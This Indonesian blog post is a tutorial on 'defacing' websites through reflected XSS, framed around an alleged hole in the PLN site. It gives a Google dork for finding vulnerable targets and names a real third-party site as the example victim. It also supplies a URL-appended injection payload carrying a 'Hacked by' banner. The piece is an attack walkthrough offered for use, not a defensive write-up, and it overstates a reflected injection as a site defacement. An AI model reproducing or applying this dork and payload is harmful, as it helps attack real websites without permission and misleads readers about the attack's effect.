Masih membahas tentang hacking lagi sob, ternyata pada website PLN ( Perusahaan Listrik Negara ) memiliki celah, terutama pada XSS nya. Cekidoot !
Screenshot :
Sekecil apapun celah keamanan pada website, pasti kalau
dibiarkan terus/tidak pernah dipatch akan menjadi sasaran empuk bagi
para attacker yang tidak bertanggung jawab.Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS
Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu
website dan dijalankan melalui browser di client. Ok deh, Langsung aja
kita bahas bersama Cara Deface Website Menggunakan Teknik XSS
Vulnerability ini !
1). Pertama, Masukan Dorknya :
1). Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=133). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface :D
Triknya
memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS
sebuah website dengan memasukan sebuah code/script HTML.
Sekian tutorial deface website kali ini dari saya, semoga artikel
tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini
dapat bermanfaat bagi sobat.
0 Komentar:
Posting Komentar